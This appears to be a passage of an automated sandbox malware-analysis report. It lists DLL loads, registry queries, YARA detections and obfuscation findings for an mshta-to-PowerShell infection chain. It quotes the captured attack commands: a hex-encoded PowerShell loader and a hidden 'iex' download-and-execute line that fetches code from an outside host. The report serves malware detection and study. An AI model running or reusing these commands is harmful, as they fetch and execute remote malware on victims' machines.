Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 6.2.powershell.exe.7590000.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($z));$bytESTRInG = $ENC.$KFPPygMgLP1k8Q6dlweOupSSqCpkfoFRvU3qNhJ7UoZFcxhvUk6qVW3HARbKd0e3nWLlF3PmHTuWwjuB6i3MOMaxawv6WeSVm1ZTT9Ruabbj2NRbSFAaOQU699DWtX0FJupzRu6JgcZNJztD9XSm3blDcSPYvu

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.powershell.exe.8220000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected MSILLoadEncryptedAssembly

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B386E pushad ; iretd	6_2_006B3878
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B3948 pushad ; iretd	6_2_006B3952
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B392B pushad ; iretd	6_2_006B392C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B5900 push cs; ret	6_2_006B5910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B3983 push esp; iretd	6_2_006B398A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B7201 push edi; retn 0042h	6_2_006B7206
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B161D pushad ; retf	6_2_006B1621
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_006B57C0 push cs; ret	6_2_006B5910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C35150 push esp; ret	6_2_06C35612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C611BF push FFFFFFE8h; retf	6_2_06C611C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7DFAB push es; iretd	6_2_06C7DFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C79F31 push A406C54Ah; ret	6_2_06C79F3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C7ED88 pushad ; retf	6_2_06C7ED95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C92DE1 push es; retf	6_2_06C92E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C94218 push eax; ret	6_2_06C94219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06C9FA20 push edx; retf	6_2_06C9F9CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E62BCD push es; iretd	6_2_06E62BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E62C1D push es; retf	6_2_06E62C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E6ADBD push edx; retf	6_2_06E6ADC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_06E62D51 push es; iretd	6_2_06E62D54
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07319C8F push 3C0704F5h; ret	6_2_07319C95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh	8_2_0043D812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00443469 push ebp; iretd	8_2_0044346C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0044366E push 9F00CD97h; ret	8_2_004436B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h	8_2_0043AE3E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_004477A5 push ebp; iretd	8_2_004477AA

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
